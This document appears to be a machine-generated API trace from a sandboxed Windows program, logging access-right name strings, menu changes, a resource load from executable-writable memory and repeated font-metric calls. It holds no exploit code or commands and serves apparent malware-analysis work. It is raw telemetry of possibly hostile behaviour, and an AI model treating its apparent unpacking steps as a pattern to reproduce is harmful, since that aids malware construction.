[0160.009] SysReAllocStringLen (in: pbstr=0x29ce300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce300*="STANDARD_RIGHTS_READ") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce2f0*="STANDARD_RIGHTS_ALL") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce2e0*="DELETE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce2d0*="READ_CONTROL") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce2c0*="WRITE_OWNER") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce2b0*="WRITE_DAC") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x29ce2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x29ce290*="PRINTER_ACCESS_USE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x29ce280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x29ce270*="SERVER_ACCESS_ENUMERATE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x29ce260*="SERVER_ACCESS_ADMINISTER") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x29ce250*="PRINTER_ALL_ACCESS") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x29ce240*="PRINTER_EXECUTE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x29ce230*="PRINTER_WRITE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x29ce220*="PRINTER_READ") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x29ce210*="PRINTER_ALL_ACCESS") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce200*="DELETE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce1f0*="READ_CONTROL") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce1e0*="WRITE_OWNER") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce1d0*="WRITE_DAC") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x29ce1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x29ce1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x29ce1a0*="SC_MANAGER_LOCK") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x29ce190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x29ce180*="SC_MANAGER_CONNECT") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x29ce170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x29ce160*="SC_MANAGER_ALL_ACCESS") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce140*="STANDARD_RIGHTS_WRITE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce130*="STANDARD_RIGHTS_READ") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce120*="STANDARD_RIGHTS_ALL") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce110*="DELETE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce100*="READ_CONTROL") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce0f0*="WRITE_OWNER") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce0e0*="WRITE_DAC") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x29ce0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x29ce0c0*="SERVICE_STOP") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x29ce0b0*="SERVICE_START") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x29ce0a0*="SERVICE_QUERY_STATUS") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x29ce090*="SERVICE_QUERY_CONFIG") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x29ce080*="SERVICE_PAUSE_CONTINUE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x29ce070*="SERVICE_INTERROGATE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x29ce060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x29ce050*="SERVICE_CHANGE_CONFIG") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x29ce040*="SERVICE_ALL_ACCESS") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce020*="STANDARD_RIGHTS_WRITE") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce010*="STANDARD_RIGHTS_READ") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29ce000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce000*="STANDARD_RIGHTS_ALL") returned 1
[0160.010] SysReAllocStringLen (in: pbstr=0x29cdff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29cdff0*="DELETE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29cdfe0*="READ_CONTROL") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29cdfd0*="WRITE_OWNER") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29cdfc0*="WRITE_DAC") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x29cdfb0*="KEY_SET_VALUE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x29cdfa0*="KEY_CREATE_LINK") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x29cdf90*="KEY_CREATE_SUB_KEY") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x29cdf80*="KEY_NOTIFY") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x29cdf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x29cdf60*="KEY_QUERY_VALUE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29cdf50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29cdf40*="STANDARD_RIGHTS_WRITE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x29cdf30*="STANDARD_RIGHTS_READ 2") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x29cdf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29cdf10*="DELETE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29cdf00*="READ_CONTROL") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29cdef0*="WRITE_OWNER") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29cdee0*="WRITE_DAC") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x29cded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x29cdec0*="DESKTOP_WRITEOBJECTS") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x29cdeb0*="DESKTOP_JOURNALRECORD") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x29cdea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x29cde90*="DESKTOP_HOOKCONTROL") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x29cde80*="DESKTOP_CREATEWINDOW") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x29cde70*="DESKTOP_CREATEMENU") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x29cde60*="DESKTOP_READOBJECTS") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x29cde50*="DESKTOP_ENUMERATE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29cde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29cde30*="STANDARD_RIGHTS_WRITE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29cde20*="STANDARD_RIGHTS_READ") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29cde10*="STANDARD_RIGHTS_ALL") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29cde00*="DELETE") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29cddf0*="READ_CONTROL") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cdde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29cdde0*="WRITE_OWNER") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29cddd0*="WRITE_DAC") returned 1
[0160.011] SysReAllocStringLen (in: pbstr=0x29cddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x29cddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x29cddb0*="WINSTA_READSCREEN") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x29cdda0*="WINSTA_READATTRIBUTES") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x29cdd90*="WINSTA_EXITWINDOWS") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x29cdd80*="WINSTA_ENUMERATE") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x29cdd70*="WINSTA_ENUMDESKTOPS") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x29cdd60*="WINSTA_CREATEDESKTOP") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x29cdd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x29cdd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29cdd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29cdd20*="STANDARD_RIGHTS_WRITE") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29cdd10*="STANDARD_RIGHTS_READ") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x29cdd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29cdcf0*="READ_CONTROL") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x29cdce0*="SI_ACCESS_SPECIFIC") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29cdcd0*="WRITE_DAC") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x29cdcc0*="FILE_DELETE") returned 1
[0160.012] SysReAllocStringLen (in: pbstr=0x29cdcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x29cdcb0*="FILE_DELETE_CHILD") returned 1
[0160.013] SetClassLongA (hWnd=0xb01dc, nIndex=-14, dwNewLong=65575) returned 0x0
[0160.014] GetSystemMenu (hWnd=0xb01dc, bRevert=0) returned 0xa01e7
[0160.014] DeleteMenu (hMenu=0xa01e7, uPosition=0xf030, uFlags=0x0) returned 1
[0160.014] DeleteMenu (hMenu=0xa01e7, uPosition=0xf000, uFlags=0x0) returned 1
[0160.014] DeleteMenu (hMenu=0xa01e7, uPosition=0xf010, uFlags=0x0) returned 1
[0160.014] GetCurrentThreadId () returned 0x6e4
[0160.014] ResetEvent (hEvent=0xa0) returned 1
[0160.014] GetCurrentThreadId () returned 0x6e4
[0160.014] GetCurrentThreadId () returned 0x6e4
[0160.014] GetCurrentThreadId () returned 0x6e4
[0160.014] ResetEvent (hEvent=0xa0) returned 1
[0160.014] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f194, fWinIni=0x0 | out: pvParam=0x24f194) returned 1
[0160.014] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f194, fWinIni=0x0 | out: pvParam=0x24f194) returned 1
[0160.014] GetSystemMetrics (nIndex=49) returned 16
[0160.014] GetSystemMetrics (nIndex=50) returned 16
[0160.014] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f1dc, fWinIni=0x0 | out: pvParam=0x24f1dc) returned 1
[0160.015] IsWindowVisible (hWnd=0xb01dc) returned 0
[0160.015] GetCurrentThreadId () returned 0x6e4
[0160.015] VirtualQuery (in: lpAddress=0x29a1668, lpBuffer=0x24f0ac, dwLength=0x1c | out: lpBuffer=0x24f0ac*(BaseAddress=0x29a1000, AllocationBase=0x28e0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0160.015] FindResourceA (hModule=0x28e0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29e8990
[0160.015] FindResourceA (hModule=0x28e0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29e8990
[0160.015] LoadResource (hModule=0x28e0000, hResInfo=0x29e8990) returned 0x29ef044
[0160.015] SizeofResource (hModule=0x28e0000, hResInfo=0x29e8990) returned 0xca5
[0160.015] LockResource (hResData=0x29ef044) returned 0x29ef044
[0160.015] GetCurrentThreadId () returned 0x6e4
[0160.015] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24ee60, fWinIni=0x0 | out: pvParam=0x24ee60) returned 1
[0160.015] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24ee60, fWinIni=0x0 | out: pvParam=0x24ee60) returned 1
[0160.015] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24ee60, fWinIni=0x0 | out: pvParam=0x24ee60) returned 1
[0160.015] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24ee60, fWinIni=0x0 | out: pvParam=0x24ee60) returned 1
[0160.016] GetDC (hWnd=0x0) returned 0x4f010863
[0160.016] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee44 | out: lptm=0x24ee44) returned 1
[0160.016] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0160.018] CreateFontIndirectA (lplf=0x24edfc) returned 0x310a0871
[0160.018] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.018] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee7c | out: lptm=0x24ee7c) returned 1
[0160.018] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.018] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.018] GetSystemMetrics (nIndex=6) returned 1
[0160.018] VirtualAlloc (lpAddress=0x2a04000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a04000
[0160.019] GetDC (hWnd=0x0) returned 0x4f010863
[0160.019] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee44 | out: lptm=0x24ee44) returned 1
[0160.019] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.019] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee7c | out: lptm=0x24ee7c) returned 1
[0160.019] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.019] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.019] GetSystemMetrics (nIndex=6) returned 1
[0160.019] GetDC (hWnd=0x0) returned 0x4f010863
[0160.019] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee44 | out: lptm=0x24ee44) returned 1
[0160.019] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.019] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee7c | out: lptm=0x24ee7c) returned 1
[0160.019] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.019] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.019] GetSystemMetrics (nIndex=6) returned 1
[0160.020] GetDC (hWnd=0x0) returned 0x4f010863
[0160.020] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee44 | out: lptm=0x24ee44) returned 1
[0160.020] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.020] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee7c | out: lptm=0x24ee7c) returned 1
[0160.020] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.020] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.020] GetSystemMetrics (nIndex=6) returned 1
[0160.020] GetDC (hWnd=0x0) returned 0x4f010863
[0160.020] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee58 | out: lptm=0x24ee58) returned 1
[0160.020] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.020] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee90 | out: lptm=0x24ee90) returned 1
[0160.020] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.020] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.020] GetSystemMetrics (nIndex=6) returned 1
[0160.020] GetDC (hWnd=0x0) returned 0x4f010863
[0160.020] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb5c | out: lptm=0x24eb5c) returned 1
[0160.020] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.020] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb94 | out: lptm=0x24eb94) returned 1
[0160.020] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.020] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.021] GetSystemMetrics (nIndex=6) returned 1
[0160.021] GetDC (hWnd=0x0) returned 0x4f010863
[0160.021] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee58 | out: lptm=0x24ee58) returned 1
[0160.021] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.021] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee90 | out: lptm=0x24ee90) returned 1
[0160.021] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.021] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.021] GetSystemMetrics (nIndex=6) returned 1
[0160.021] GetDC (hWnd=0x0) returned 0x4f010863
[0160.021] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb5c | out: lptm=0x24eb5c) returned 1
[0160.021] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.021] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb94 | out: lptm=0x24eb94) returned 1
[0160.021] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.021] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.021] GetSystemMetrics (nIndex=6) returned 1
[0160.021] GetDC (hWnd=0x0) returned 0x4f010863
[0160.022] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee58 | out: lptm=0x24ee58) returned 1
[0160.022] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.022] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee90 | out: lptm=0x24ee90) returned 1
[0160.022] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.022] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.022] GetSystemMetrics (nIndex=6) returned 1
[0160.022] GetDC (hWnd=0x0) returned 0x4f010863
[0160.022] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb5c | out: lptm=0x24eb5c) returned 1
[0160.022] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.022] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb94 | out: lptm=0x24eb94) returned 1
[0160.022] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.022] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.022] GetSystemMetrics (nIndex=6) returned 1
[0160.022] GetDC (hWnd=0x0) returned 0x4f010863
[0160.022] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee44 | out: lptm=0x24ee44) returned 1
[0160.022] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.022] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee7c | out: lptm=0x24ee7c) returned 1
[0160.022] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.022] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.022] GetSystemMetrics (nIndex=6) returned 1
[0160.023] GetDC (hWnd=0x0) returned 0x4f010863
[0160.023] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee44 | out: lptm=0x24ee44) returned 1
[0160.023] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
